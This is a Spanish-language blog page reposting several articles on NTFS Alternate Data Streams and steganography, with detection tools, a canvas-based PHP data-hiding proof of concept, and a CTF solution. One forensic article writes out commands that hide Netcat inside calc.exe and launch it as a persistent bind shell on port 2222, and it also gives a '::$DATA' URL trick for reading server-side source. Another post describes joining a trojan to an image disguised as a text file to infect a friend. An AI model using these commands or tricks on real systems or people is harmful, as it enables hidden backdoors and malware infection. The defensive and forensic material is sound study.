Banner 1

Mostrando entradas con la etiqueta estenografia. Mostrar todas las entradas
Mostrando entradas con la etiqueta estenografia. Mostrar todas las entradas

Hide Data in a Secret Text File Compartment

0 comentarios

In today’s edition of Stupid Geek Tricks (where we show off little-known tricks to impress your non-geek friends), we’ll learn how to hide data in a text file that can’t be seen by anybody else unless they know the name of the secret compartment.
Note: This article was originally written a couple of years ago, but we’ve updated and polished it for Windows 7, and we’re sharing it with all the new readers again.

Here’s How it Works

Ever since Windows 2000, the NTFS file system in Windows has supported Alternate Data Streams, which allow you to store data “behind” a filename with the use of a stream name. It’s not detectable while browsing the file system, or anywhere within Windows… you can only access it with the “secret key” which is really just the name of the stream.
image
You can think of these extra streams as secret compartments within the file that can only be accessed if you know the “secret code,” which in this case is just the name of the stream.
This isn’t a completely secure way to hide data as we’ll illustrate below, but it’s a fun trick to know about in a pinch.
Note: This only works on a drive formatted with NTFS.

Hiding Data in a Secret Compartment

In order to use this feature, you’ll have to open a command prompt and use the following syntax:
notepad SomeFile.txt:SecretWordHere.txt
You can use anything after the colon as a secret word, the key is that there can’t be any spaces between the first filename and the colon.
image
If you didn’t specify .txt on the end, Notepad will automatically add it, and ask if you want to create a new file, even if SomeFile.txt already existed, because SecretSquirrel!.txt doesn’t already exist.
image
Now you can enter in whatever data you want here and save the file:
image
When you look at the file, it will still be the exact same size as before:
image
You can even open up the file by double-clicking on it, and add whatever data you want to make the file look normal:
image
You can use the command line again to add a second hidden “compartment” with a different name:
image
You can add whatever other information to this file that you’d like:
image
None of these hidden files will affect the other, or change the main file. Just remember, you have to use the command line to access the hidden data.
Note: Once you create a hidden stream, that stream isn’t exactly part of the file… you can’t copy your file to another location and access the streams over there.

Detecting Files with Streams

Of course these files aren’t completely hidden from everybody, because you can use a small command line application called Streams.exe to detect files that have streams, including the names of the streams.
For instance, in my scenario we’d use the following syntax:
streams.exe SomeFile.txt
image
As you can see, the names of the streams are shown, which would allow you to easily access them.
If you’re using Windows 7, you can simply use the /R argument to the DIR command to see the streams:
image

Deleting Streams

You can use the same Streams.exe command to delete all streams from a file, although I don’t think you can delete just a single stream. Use the following syntax:
streams.exe -d SomeFile.txt
image
As you can see in the screenshot, the streams are now removed from the file.

Adding to Hidden Streams from the Command Line

You can add data to a hidden stream by using a number of commands, or really anything that can pipe input or output and accept the standard FileName:StreamName syntax. For instance, we could use the echo command:
echo “Neat!” > SomeFile.txt:Test
image
You can see with the streams command in the example above that we now have a hidden stream on the file.

Reading a Stream From the Command Line

You can read data from the stream by piping data into the more command, using this syntax:
more < FileName:StreamName
In my example the actual command was this:
more < SomeFile.txt:SecretSquirrel!.txt
image
As you can see, the secret data that we added is outputted to the console.

Of course, this isn’t a secure way to hide data—for that you should use TrueCrypt. It’s just one of those things that can be fun to use and might come in handy here or there.
Learning is fun, isn’t it?

Fuente: http://www.howtogeek.com/howto/windows-vista/stupid-geek-tricks-hide-data-in-a-secret-text-file-compartment/

NTFS Alternate Data Streams: Hiding data in plain sight since 1993

0 comentarios
I recently read an article in the Hackin9 magazine (worth taking a look if you haven’t heard about it) about alternate data streams (ADS) in NTFS. I had heard about this hidden feature in NTFS a long time ago actually, but over the years forgot about its existence again.

Background
In a nutshell, the NTFS file system, which was introduced with Windows NT 3.1, supports ADS – sometimes also referred to as “hidden streams”. This means that you can attach or associate any number of files to an existing file, yet those files will not be visible to the vast majority of file management applications – including explorer and the “dir” command (Vista can show ADS with a parameter). One thing I find interesting about streams is that a lot of people in IT do not seem to
know about them, even people otherwise very familiar with the Windows
Operating System.
Now, streams are created and accessed by appending the “host” file name with a colon, followed by the name of the stream. Let’s say you want to create a text file called financials.txt and hide it with winhelp.exe, you would run notepad C:\Windows\winhelp.exe:financials.txt. This will bring up notepad which will prompt you to create the file since it doesn’t exist (since the alternate stream is basically a file). You can then save any text in the hidden file and save it. You will notice that the file you just created will not show up when you do a directory list (dir C:\Windows) and will also not show up in the Windows Explorer. Note that the timestamp of the host file will change however.
Now there are of course a variety of utilities that have been developed in the last 15 (!) years that will allow you to find hidden streams, but more on that later. Hidden streams still exist on Vista and later, though the feature seems to have become more restrictive.
There are apparently no limits as to how many streams one can associate with a file, or the type of file that can be associated. This means that you can associate an executable as much as you can an ASCII file. There are however some limitations as to how user mode applications (e.g. notepad) can access hidden streams.
Let’s go back to the previous example where we created the file financials.txt in winhelp.exe. If you open a command prompt and execute type C:\Windows\winhelp.exe:financials.txt, then you will not be able to see the contents of the hidden file. If you use notepad instead however, you will be able to see the file (notepad C:\Windows\winhelp.exe:financials.txt). This is probably because cmd.exe and its built-in commands up until Windows XP are not aware of alternate streams. ON a Windows XP machine I also could not open that same file if I tried to open it from inside notepad with the File -> Open command.

Creating Streams
Things get more interesting when you attach executables to files – and execute them! Let’s say I wanted to hide popular windows game solitaire inside the file C:\Windows\wganotify.log and call the stream “calc.exe”. Here is what you do:
type system32\sol.exe > C:\Windows\WgaNotify.log:calc.exe
start C:\windows\WgaNotify.log:calc.exe

Auditing Alternate Data Streams
Those of you interested in auditing will probably wonder how Windows tracks access to hidden streams in the event log. Well, there is good and bad news. The bad news is that object tracking (the famous event 560) does not show hidden streams, and instead only shows the “host” file name being accessed. Process Tracking on the other hand shows hidden streams in the expected manner. For the above example, a 592 event will show that file C:\windows\WgaNotify.log:calc.exe was executed.

Exploiting Streams
Scary, huh? This opens up a can of worms when you think about malware hiding inside otherwise innocent files – such as a log file. At appears as if most AntiVirus products do not detect hidden streams, at the same time there doesn’t seems to be a significant number of mainstream malware applications out there are that rely on hidden streams. I’m not sure why that is, since this feature seems almost too good to be true for the writer of any malicious applications. One reason might be that malware writers mostly target home machines, and many of those computers are still formatted with the FAT(32) file system, which of course doesn’t support ADS. This might change over time though, as more (home) computers use NTFS as their file system.
So after reading up on ADS, playing around with it last week, scanning my computer for hidden streams, I arrived at the inevitable question: What is the higher purpose of Alternate Data Streams? I mean, many applications don’t support it, most people don’t know about it, and a scan didn’t reveal any hidden streams besides a couple inside some Microsoft installers that apparently use them as some sort of meta data.
As it turns out, ADS was created for compatibility with the Macintosh HFS file system, which uses a data fork and resource fork to store data in a file (OS X now uses the HFS+ file system). But over the years (it’s been 15 after all) some developers at Microsoft decided to utilize this feature. For example, when you specify summary information about a file (right-click -> properties -> summary), then this information will be stored in ADS.
As mentioned earlier, there have been some improvements in regards to ADS with Vista and later. Vista can now show alternate streams with the /R switch of the “dir” command. My preliminary research also shows that hidden streams can no longer be executed in Vista or later – so what we did in the above example will not work. I think that’s a good thing, since there really is no practical reason (unless you develop malware) to do this. The screen shot below shows the output of a regular dir command and the dir /R command on a Windows 2008 server (note the file setupact.log).
ADS_Win2k8.jpgIn my humble opinion, Microsoft should get rid of alternate streams in future versions of Windows, and instead come up with some sort of structured way of embedding meta data in files. Anything contained in meta data should be non-executable and limited in size, e.g. 256kb.

Discovering Streams

So what does all this mean for you, the person responsible for security in your network? How can you find hidden streams and detect if streams are being added to files?
There are many free third-party utilities out there that show and manipulate hidden streams, but the discovery of this feature led us to extend the functionality of the File Monitoring feature of EventSentry to include the automatic detection of hidden streams in real-time. This means that any stream added, modified or removed from a file in a monitored location will be detected by EventSentry.
We have also developed a new command-line tool, adslist.exe, that will list all alternate data streams on a directory and optionally its sub directories. The tool is part of the NTToolkit v1.96 and I recommend that you schedule to run this tool with the Application Scheduler feature of EventSentry on a regular basis, or schedule it with the Windows Task Scheduler and email the results (adslist.exe C:\ /s). The advantage of using EventSentry is that the results of adslist.exe can automatically be emailed to you only if alternate streams were found. You can do this because the %ERRORLEVEL% is set to 1 by adslist.exe when one or more streams are found. The screenshot below shows what this would look like in the email sent by EventSentry:
EventSentry_ApplicationScheduler_ADSList.pngManipulating StreamsWhile Microsoft doesn’t offer a tool to search for and discover alternate data streams, they do offer a good explorer-extension that allows you to view and delete alternate data streams. You can download it from http://download.microsoft.com/do
wnload/F/C/6/FC6943EB-790A-44AA-B32D-14ED7E22FD5D/NTFSExt.exe
, the zip file contains the source code as well as another utility to create hard links on NTFS volumes. After extracting the archive, navigate to the \StrmExt\ReleaseMinDependency folder and run regsvr32 StrmExt.dll. You will then have an additional tab when viewing file properties in explorer called “Streams”:
StrmExt.jpgAnother way to get rid of hidden streams is to copy a file to a FAT[32] volume and then back to the NTFS volume, or – if you don’t have a FAT[32] volume available – simply compress and uncompress the file again.
Well, I hope this gives you a better understanding of alternate data streams, even if you were already familiar with them. Like I mentioned earlier, it doesn’t appear as if ADS is used for evil in a large scale quite yet (so no reason to panic!), but I believe it is better to be safe than sorry.

Fuente: http://www.eventsentry.com/blog/2008/07/ntfs-alternate-data-streams-hi.html

Dissecting NTFS Hidden Streams

0 comentarios
by Chetan Gupta
NII Consulting, Mumbai
www.niiconsulting.com

Cyber Forensics is all about finding data where it is not supposed to exist. It is about keeping the mind open, thinking like the evil attacker and following the trails taking into account any potential source of evidence. After the analyst has created the disk image of the suspect disk, he needs to analyze the file system for any signs of compromise. The most popular file systems encountered by the analysts are FAT, NTFS, UFS, EXT, and CDFS. Most of the workstations use Microsoft Windows as their preferred Operating System and use NTFS as the file system of choice. I am not going to go into the details of this robust and secure file system but I would be talking about a particular feature of this file system which was designed to offer compatibility with Macintosh Hierarchical File System (HFS) and store additional data called metadata for a file. This feature is known as ALTERNATE DATA STREAMS (ADS).
The Macintosh file system stores its data in two parts, the resource fork and the data fork. The data fork is where the data is actually contained and the resource fork tells the operating system how to interpret the data fork. Alternate Data Streams is the Microsoft way of implementing resource fork. The ADS is a hidden stream in addition to the regular data stream which contains the main data for the file. This hidden stream contains metadata for the file such as the file access/modification times, attributes etc. However, in Windows, the operating system decides how to use the particular data found in the files based on file extensions such as .bat, .exe, .txt, and .html.
Background
ADS were introduced into the Windows NTFS file system starting in Windows NT 3.1. This feature is not well documented and most users including developers are unaware of it. Now the question is why Microsoft would introduce such a feature. The answer to that would be the need to add "extra" information to the files without altering the original file format or content. This extra information is the metadata about the file. This metadata is arranged in the form of streams that attach to the main data stream (the stream which is visible to a normal user). For example, one file stream could hold the security information for the file such as access permissions while another one could hold data that describes the purpose of the file, its author and the MAC times.
These metadata containing streams are hidden files that are linked to a normal visible file. Many applications use ADS to store attributes of a file in them. For example, if you create a word document and right click and go into its properties, you can see a summary page which contains information that contains metadata about the data contained in the file. The metadata includes the author of the document, word count, no of pages and so on. This summary information is attached to the file via ADS.

Figure1. The summary tab displaying metadata

Quoting Microsoft,
"When you read the content of a file under a non-NTFS volume (say, a disk partition of a Windows 98 machine) you're able to access only one stream of data. Consequently, you perceive it as the real and 'unique' content for that file. Such a main stream has no name and is the only one that a non-NTFS file system can handle. However when you create a file on an NTFS volume, things might be different."

Figure2. The structure of a multi-stream file
Ref. http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnfiles/html/ntfs5.asp

10 Things to know about ADS
1. There is no limit on the size of streams and there can be more than one stream linked to a normal file. ADS are not visible in explorer or via command prompt. In fact, their size is also not reported by Windows!
2. Streams can be attached not only to files but also to folders and drives!
3. The content of an ADS should not be considered limited to simply text data. Any stream of binary information can constitute a file which includes executables, Mpeg files, Jpeg files etc.
4. ADS have no attributes of their own. The access rights assigned to the default unnamed stream are the rights that control any operation on ADSs such as creation, deletion or modification. This means if a user cannot write to a file, that user cannot add an ADS to that file. A user with guest privileges can also create such streams in every file where he has write access.
5. Some Browser helper Objects (BHOs) have started storing their malicious files inside ADS and very few anti-spyware/malware actually detect it.
6. Windows File Protection prevents the replacement of protected system files; it does not prevent a user with the appropriate permissions from adding ADS to those system files. The System File Checker (sfc.exe) will verify that protected system files have not been overwritten, but will not detect ADS.
7. Microsoft Windows provides no tools or utilities either within the operating system software distribution or the Resource Kits for detecting the presence of ADS.
8. The stream can only be executed if called directly by a program with the full path to the file given. It is impossible to accidentally execute a stream.
9. None of the Internet protocols enabling file transfer such as SMTP, FTP etc. support streams. This means that ADS can't be sent via Internet. However, files containing ADS can be sent across a local LAN provided the target drive is in the NTFS format.
10. In certain cases, streams have been used to remotely exploit a web server. Some web servers are susceptible to having their file source read via the: $DATA stream. If a server side script such as PHP or ASP is running on a web server which is not patched properly, instead of getting output as a result of processing the script, the source code of the ASP/PHP file could be viewed by using a URL like this:
http://www.abcd.com/index.asp::$DATA
This is a critical vulnerability as the server-side source code could reveal sensitive information including how the site has been coded and how the information is flowing. This information could be used by the attacker to launch a specific attack on the server.

How to create ADS
To create ADS, we can use common DOS command 'type'. This command is used in conjunction with a redirect [>] and colon [:] to fork one file into another.
Examples
1. C:\Documents and Settings\CnX>type c:\nc.exe > C:\windows\system32\calc.exe:svchost.exe
2. echo 'the password is xlswwe22' > c:\tst.txt:test.txt
Let's examine a scenario in which an attacker successfully compromises a remote system and then leaves a backdoor by planting Netcat in the machine. He does not want to create a visible file which has a greater risk of being detected. Instead, he is aware that the file system used by the computer is NTFS and intends to use the ADS feature to hide his files. He runs a command to cleverly hide Netcat (nc.exe also known as Swiss Army knife tool for hackers) into calc.exe which is the Windows integrated calculator program.
Also, he changes the file name from nc.exe to a relatively more common process called svchost.exe which may help in it being overlooked by innocent administrators.
C:\Documents and Settings\CnX>type c:\nc.exe > C:\windows\system32\calc.exe:svchost.exe
He then runs the following command:
C:\Documents and Settings\CnX> start /B C:\windows\system32\calc.exe:svchost.exe -d -L -p 2222 -e cmd.exe
Important note: The /B option allows the attacker to run the command without spawning a new window (which could alert the user that something is going on without his knowledge)
Now, this is very dangerous as the attacker has bound a shell on port 2222 and can get access to the system anytime he wants by performing a simple telnet on the port 2222.
As you can see from the snapshot, there is no change in the size of the calc.exe. The only visible change is in the modification date and time of the calc.exe program which is overlooked by many users. More importantly, I have run the famous system file checker utility inbuilt in Windows.
This utility will check whether any of the system files have been modified. This feature is called as the Windows File Protection feature. Ideally, if a system file is changed, the WFP feature will replace it with the original file and this would be logged in the event viewer with an event id of 64002 and a message like this:
File replacement was attempted on the protected system file calc.exe. This file was restored to the original version to maintain system stability. The file version of the system file is 5.1.2600.0.
But as you can see from the snapshot, the sfc.exe utility doesn't report anything!
I then run the netstat utility to show that the port 2222 was indeed listening for a connection and would return a shell when the attacker performs a telnet to the system on port 2222. And don't forget that the listener created a persistent listener and would continue to listen on the port even after one connection is closed (thanks to the -L option of Netcat)!

Figure3. ADS Demonstration
Let's see how the process looks like in the task manager (CTRL+ALT+DEL)

Figure4. Windows Task Manager displaying the hidden EXE

Tools to find ADS
First you would like to check whether your system supports ADS or not. The utility to do that is AdsCheck.exe.
1. AdsCheck.exe (http://www.diamondcs.com)


2. Lads.exe (www.heysoft.de)
One of the best tools available for ADS is lads.exe, written by Frank Heyne. 'Lads.exe' does an excellent job of reporting the availability of ADS.

Figure5. Demonstrating lads.exe

3. LNS - List NTFS Streams (http://ntsecurity.nu/toolbox/lns/)
LNS is a tool that searches for NTFS streams (alternate data streams or multiple data streams). This can be useful in a forensic investigation.

Figure6. Demonstrating lns.exe

4. Ads Spy (http://www.spywareinfo.com/~merijn/files/adsspy.zip)
Ads Spy is a tool used to list, view or delete Alternate Data Streams (ADS) on Windows 2000/XP with NTFS file systems. This tool can not only detect the ADS but also remove them with the click of a button

Figure7. Demonstrating Ads spy

5. SFind (http://www.foundstone.com)
SFind scans the disk for hidden data streams and lists the last access times.

Figure8. Demonstrating SFind.exe
6. Streams.exe (http://www.sysinternals.com/utilities/streams.html)
Streams.exe examines the files and directories you specify and informs you of the name and sizes of any named streams it encounters within those files. Streams.exe makes use of an undocumented native function for retrieving file stream information.

Figure9. Demonstrating Streams.exe

7. Hijackthis (http://www.merijn.org/files/hijackthis.zip) -- *RECOMMENDED*
Hijackthis is an award winning tool which examines certain key areas of the Registry and Hard Drive and lists their contents. These are areas which are used by both legitimate programmers and hijackers. It is an advanced utility which I use after I have run spybot - search and destroy. The best feature about Hijackthis is that you can save a log file and submit for an online analysis at http://www.hijacthis.de. The analysis would help you get a better understanding of the processes running on your system.
Hijackthis includes many other tools such as StartupList log, Ads Spy, Hosts file manager, etc. which make it one great tool for any administrator.

Figure10. Demonstrating Hijackthis tool

8. Listing ADS via streams tab in the properties window - The Microsoft way
Download NTFSext.exe from http://download.microsoft.com/download/F/C/6/FC6943EB-790A-44AA-B32D-14ED7E22FD5D/NTFSExt.exe NTFSext.exe contains a DLL file called strmext.dll. Copy this DLL to the system32 folder and run the command
regsvr32 StrmExt.dll
This will create a new tab in the file properties of Windows Explorer. If you suspect that a file has an ADS, you can open its properties windows and check the streams tab which would list any streams attached with the file.

Figure11. Demonstrating streams tab
In order to achieve the same for the folders as well, you need to add the following two registry entries by running regedit.exe from the run browser
HKEY_CLASSES_ROOT\Directory\shellex\PropertySheetHandlers\{C3ED1679-814B-4DA9-AB00-1CAC71F5E337} HKEY_CLASSES_ROOT\Drive\shellex\PropertySheetHandlers\{C3ED1679-814B-4DA9-AB00-1CAC71F5E337}

Retrieving a file's contents from an Alternative Data Stream
1. If its an executable, you can run it using the inbuilt start command in Windows or you can use "psexec.exe" tool available at http://sysinternals.com
2. If its a normal text file you can use cat command available in Windows resource kit or use the more command available in Windows

Figure12. Retrieving ADS contents

Removing ADS from a file
An ADS attached to a file can be removed by using the following methods:
1. Using tools such as Ads Spy, Hijackthis, Streams.exe, or from the streams tab in the properties window of a file
2. Copying the file to a Non-NTFS file system such as FAT32 which does not support ADS
3. Moving the contents of the main unnamed stream into another file by using the following command:
more < original.exe > originalcopy.exe - copies only the main unnamed stream
ren originalcopy.exe original.exe -- rename the file to its original name

Conclusion
NTFS ADS is a useful feature which is increasingly being exploited by hackers to hide malicious files. The grave concern for security practitioners is that the awareness about this feature is extremely low. If the malicious files hidden in the ADS already exist on the victim's system (in cases where the Anti-virus is turned off or disabled), then some of the most popular anti-virus software such as Norton 2005 and anti-spyware such as Spybot - SnD and Microsoft Anti-Spyware do not report ADS. However, if a file with infected ADS is being written to the disk, the anti-virus detects it. This means if the users are using specialized tools like the ones mentioned above, there is a possibility for the malicious files to exist on the victim's system and lie there undetected.

References
1. http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnfiles/html/ntfs5.asp
2. http://www.diamondcs.com.au/index.php?page=archive&id=ntfs-streams
3. http://www.auditmypc.com/freescan/readingroom/ntfsstreams.asp
4. http://www.securityfocus.com/bid/149/info

Fuente:
http://www.forensicfocus.com/dissecting-ntfs-hidden-streams

Explicacion BASICA sobre las cabeceras de archivos

0 comentarios
Bien para entender posteriores temas sobre esteganografia, dare una breve y rural introduccion como entendi yo esto de las cabeceras.

Por ejemplo un archivo tiene como todo archivo una cabecera que identifica que tipo de archivo y formato es, para que asi la computadora sepa con que programa abrirlo.

Dentro de la cabecera de un archivo puede haber varia informacion como.

.-Formato
.-Dimensiones
.-Peso
.-Modificaciones
.-tipo de compresion
.-Duracion


etc…Todo depende del tipo de archivo que sea por que por ejemplo un archivo de audio puede traer en la cabecera la duracion del sonido, mientras que un archivo grafico, puede traer la paleta de colores, entonces dependiendo de que tipo de formato sea cambian los valores en bytes de las cabeceras.

Aqui pondre basicamente lo que nos importa para poder identificar mas facilmente los archivos que se oculte.

Un archivo dentro de la cabecera tiene “la firma” del archivo, que es lo que identifica a todo formato para saber que tipo de formato es.

Ejemplo:

Un archivo .png dentro de la cabecera su firma es “PNG”

 

y el pie de formato es |END


; osea con lo que empieza el archivo .png es con los primeros 3 bytes que forman la firma y eso forma PNG, y los ultimos bytes de un png forman |END.

Aqui pongo una lista con lo que podriamos identificar los archivos mas ocultados
Formato  Firma de cabecera Pie de formato

.PNG             PNG   |END
.GIF              GIF   |END
.JPG/JPEG     ÿØÿà   ÿÙ
.BMP             BM
.EXE             Mz
.MP3            ID3
.RAR             Rar
.ZIP              Pk
.PDF            %PDF


Ahora ¿Pará que nos servira esto? bien por ejemplo en la tecnica EoF si hacemos estegoanalisis a una imagen .jpg y la analizamos con el editor hexadecimal o con el comando “strings”
y vemos que el archivo empieza con ÿØÿà pero que termina con |END y no con
ÿÙ entonces deducimos que ahi hay algo oculto, por que ese |END no pertenece a un jpg, entonces hay la posibilidad que este escondido un PNG o un GIF dentro del JPG y nosotros no lo vemos.

Para esto nos servira conocer sobre esto. Bueno despues de esta pequeña explicacion, ahora si recomiendo seguir con los tutos de esteganografia por EoF.

Recuerden esto solo es una pequeña explicacion como yo creo que sera mas facil de entender para nosotros los principiantes de neobits.org


Fuente: 
Att. Por hecky para Neobits.org
Fuente: http://underc0de.org/foro/index.php?topic=13497.0

HTML5 (Canvas) + JS + Esteganografía + Cross-Domain

0 comentarios
Entre las cosas que HTML5 integra se encuentra el elemento canvas el cual nos permite trabajar a "bajo nivel" con imágenes, entonces se me ocurrió si podemos leer los valores de los pixeles de las imágenes usando canvas y JS, y ademas tenemos que img no esta limitado por dominio por lo que se puede usar para cross-domain...

Entonces se me ocurrió cambiar pixeles de una imagen (o crear una imagen nueva) colocando char por char dentro del mensaje, podría colocar hasta 3 chars por pixel pero si la cosa es que no se note el mensaje o insertar en una imagen sin que esta se altere mucho entonces que sea 1 char por pixel ;)...

entonces tenemos que un pixel esta formado por 3 valores (RGB = Rojo, Verde, Azul) por lo que se pueden meter 3 valores pero por lo que explique arriba no tiene mucho caso :P

Entonces una forma divertida de hacerlo sin alterar tanto la imagen sería:
RGB = (Ascii del char, 0, ascii del char) el por que pase el verde a 0 mas que nada es para no confundir pixeles de la imagen con pixeles del mensaje, obviamente pueden haber otros pixeles de la imagen con esa configuración por lo que no sería mas problema que cambiar el verde de 0 a 1 (lo cual no es un tono que se pueda reconocer a simple vista :P).


CODE:

/*
By Xianur0
http://hackingtelevision.blogspot.com
xianur0.null [at] gmail.com
*/
$file = "imagen.jpg"; /*El por que estoy insertando el mensaje dentro de una imagen existente en lugar de crear una? por que es divertido y menos sospechoso para muchas cosas xD. Ah recomiendo usar imágenes mas o menos grandes para que los pixeles editados no se noten mucho o para poder enviar mensajes mas grandes ;) */
$mensaje = "xianur0 was here";
function dibujarpixel($im,$x,$y,$color) {
$color = imagecolorallocate($im, $color[0],$color[1],$color[2]);
imagefilledrectangle($im, $x, $y, $x, $y, $color);
}
list($ancho, $alto, $tipo, $atributos) = getimagesize($file);
$pixeles = $ancho*$alto;
if(strlen($mensaje) > $pixeles) die("Imagen demasiado pequeña (o mensaje demasiado grande)!");
$proporcion = intval(($pixeles/strlen($mensaje)));
$im = "";
preg_match("/(\w+)$/",$file,$match);
switch(strtolower($match[1])){
case 'jpg':
case 'jpeg':
$im = imagecreatefromjpeg($file);
break;
case 'png':
$im = imagecreatefrompng($file);
break;
}
for($x=0;$x<$ancho;$x++){
for($y=0;$y<$alto;$y++){
$pixel = imagecolorat($im, $x, $y);
$colors = imagecolorsforindex($im,$pixel);
$r = $colors["red"];
$g = $colors["green"];
$b = $colors["blue"];
if($r == $b && $g == 0) { // Si el pixel puede interferir lo cambiamos un poco :P
dibujarpixel($im,$x,$y,array($r,1,$b));
}
}
}
$p = 0;
for ($i = 0; $i < strlen($mensaje); $i++) {
$y = intval($p/$ancho);
$x = intval($p-($y*$ancho));
dibujarpixel($im,$x,$y,array(ord($mensaje{$i}), 0, ord($mensaje{$i}))); // cambiamos este pixel por (ascii del char, 0, ascii del char) = (r,g,b)
$p += $proporcion;
}
header('Content-type: image/png');
imagepng($im); // Imprimimos esta imagen editada como png :P
imagedestroy($im);
?> 
y ahora para leer dichos datos desde JS + Canvas:


PoC Cross-Domain by Xianur0



Tu navegador no soporta canvas.



/CODE

Como verán es algo bastante simple, mientras el carácter que queramos enviar no pase de 255 (ascii) no debería de haber problema :P.

Como dije arriba esta forma se puede usar para estenografía o bien para pasar datos de un dominio a otro (el same origen policy da dolor de cabeza a muchos desarrolladores web por lo que esta sería una opción bastante viable en muchos casos :P).

Es una forma muy simplona pero solo es un PoC xD...

Saludos!

Para ver todo el código ir a la fuente:

http://hackingtelevision.blogspot.com/2011/10/html5-canvas-js-esteganografia-cross.html

Añadir mensajes secretos en un tweet

0 comentarios

steg-of-the-dump.js es una librería en Javascript escrita por el neozelandés Matthew Holloway para ocultar mensajes secretos en los tweets (aunque también para para cualquier otro texto). 

Su técnica se basa en la sustitución de las letras del tweet por letras similares (homógrafos Unicode) que se utilizan para ocultar el contenido secreto.
 
La técnica es válida para cualquier plataforma que no corrompa el mensaje original (que no inserte código adicional, etc.). Esto significa que esta aplicación de esteganografía funcionará con Twitter y en correos electrónicos, si bien por ejemplo Facebook probablemente lo corromperá.

El mensaje oculto sólo puede contener el siguiente subconjunto de caracteres:

abcdefghijklmnopqrstuvwxyz123456789'0.:/\%-_?&; (6-bit charset)
 
En el siguiente formulario podrás empezar a codificar/descodificar tus mensajes: demo. (por ejemplo copia y pega el título de este post ;)

Por último ten en cuenta que la técnica es de esteganografía (que no es lo mismo que cifrar el texto) y esto significa que si un tercero tiene acceso al mensaje y sabe cómo lo has ocultado podrá leerlo fácilmente. Si necesitas algo más seguro prueba por ejemplo AnonTwi de Lord Epsylon.

Fuentes:
http://www.hackplayers.com/2014/05/mensajes-secretos-en-tweets.html
- Repositorio Github
- Steganography to hide secret messages in user’s tweets  

Estenografía

0 comentarios
Hola a todos!
No habéis pensado nunca en esconder, ocultar un archivo, como soldado se camufla el cuerpo y la vestimenta del mismo color que el entorno.
Como camaleón que se hace invisible en una rama camuflándose con el color que lo rodea.
Pues dentro del maravilloso mundo de la informática también es posible ocultar un archivo dentro de otro, esta técnica se llama esteganografía. 
La esteganografía es un método criptográfico que consiste en ocultar un archivo detrás de otro. Es decir tú estas viendo por ejemplo un archivo de JPG de una imagen, pero al abrirlo, nos sorprende y es un vídeo.
Esta técnica dentro de la informática es como en casi todas sus ramas, si se utiliza de forma “buena” de protección de archivos que queramos ocultar, pues bien, pero siempre hay muchos que utilizan las herramientas y las técnicas para hacer el mal.
Imaginad si se utiliza para el mal, cogemos un archivo de imagen JPG, PNG, cual sea, ahora lo mezclamos con un archivo exe, un virus, troyano, spyware o cualquier tipo de malware, la víctima abrirá y vera una inofensiva imagen. Por lo que la víctima no sospecha nada y no analizará el archivo.
Vamos a ver un ejemplo práctico, claro eso sí siempre que experimentéis montaros un laboratorio con una maquina virtual, siempre que se juega con malware no querréis salir infectados ¿no?
Yo voy hacer la mezcla con Advance File Joiner, añadimos los dos archivos que queramos que se mezcle, en mi caso he subido una imagen de una con tetas gordas y un conocido troyano FLU. En realidad quiero que se ejecute los dos archivos.
Por cierto lo que vais a ver mas adelante es algo parecido a los archivos que últimamente se mandan por Whatsapp, en el que te mandan una fotografía de un  pedazo de tía buena y cuando lo abres sólo ves un tío que parece un lobo, y dices no!!! y quien sabe si en segundo plano ya esta corriendo un troyano.
Aquí es el punto que me refería antes, le vamos a dar una apariencia de archivo WordPad. !Compi te mando las notas!
Al abrir el archivo con formato de texto, el compi se dará una grata sorpresa al abrir una imágen de una tia  buena en pelotas, (lo siento killo, pero no he subido la imágen, por que es una Web para todos los públicos). Seguimos, el nota se partirá de risa al ver que cachondo eres, lo que no sabe que en segundo plano a iniciado a FLU.
Fijaros como es el asunto el ve un archivo de texto, lo ejecuta y ve una imágen y segundo plano es un troyano.
Recomendación, si hubiésemos tenido desmarcado el "ocultar las extensiones de archivos", veríamos que era realmente un archivo exe. No abráis nunca un ejecutable, analizarlo antes o jugar con el en una maquina virtual.
 
Fuente:http://estacioninformatica.blogspot.com.es/

Solución al reto 15 de las ovejas negras - Hack-players

0 comentarios
Buenas tardes.

Esta entrada es la solución al reto 15 de estenografía de la comunidad hack-players.

__________________________________________________________________________________

Si obviamos el enunciado, lo primero que llama la atención de nuestro reto esteganográfico nº 15 es que el rebaño de ovejas es realmente un mosaico formado por 6 imágenes:

 style="font-size: small;"> />
 class="prettyprint" style="overflow: auto;"> style="font-size: small;">
 class="reto15">
 class="nobr">
 border="0" height="188" src="https://sites.google.com/site/h4ckpl4y3s/oveja1.png" width="200" />
 border="0" height="188" src="https://sites.google.com/site/h4ckpl4y3s/oveja2.png" width="200" />
 border="0" height="188" src="https://sites.google.com/site/h4ckpl4y3s/oveja3.png" width="200" />
 class="nobr">
 border="0" height="188" src="https://sites.google.com/site/h4ckpl4y3s/oveja4.png" width="200" />
 border="0" height="188" src="https://sites.google.com/site/h4ckpl4y3s/oveja5.png" width="200" />
 border="0" height="188" src="https://sites.google.com/site/h4ckpl4y3s/oveja6.png" width="200" />
Por lo que procedemos a descargar las imágenes para analizarlas. Para ello y tal como indicamos en el tip del reto, añadimos a cada URL '?attredirects=0' para obtener cada original. Por ej. https://sites.google.com/site/h4ckpl4y3s/oveja1.png?attredirects=0.

El siguiente paso es observar atentamente las imágenes. Si aumentamos el zoom vemos que en la parte superior de la primera imagen se han modificado algunos píxeles. 


Si observamos el resto veremos que en cada una de ellas también existen píxeles modificados: ¡el mensaje secreto se encuentra repartido en todas las imágenes del mosaico!

Ahora bien, ¿qué método o herramienta han sido utilizados?

Sabiendo que se trata de múltiples portadoras en imágenes, si realizamos una búsqueda rápida (https://www.google.es/search?q=stego+multiple+png+images) pronto daremos con ello: el artículo Steganography II - multiple key and carrier files en CodeProject nos enseña un método sencillo para ocultar datos a lo largo de varias imagenes.

El procedimiento resumido es el siguiente:
- la CLAVE se obtiene mediante una operación XOR entre los bytes de un fichero clave y la repetición de una contraseña a nuestra elección
- se añaden las IMÁGENES del mosaico a un array (CarrierImages)
- se escribe la longitud del MENSAJE SECRETO en el primer pixel de la primera imagen
- se realiza un XOR entre un byte de la CLAVE y un byte del MENSAJE SECRETO y se calculan las coordenadas del pixel donde se almacenará el byte del mensaje
- se reemplaza uno de los componentes R, G o B del pixel con el byte del MENSAJE SECRETO
- se repite el procedimiento con los siguientes bytes del MENSAJE SECRETO y a través de las IMAGENES en el array

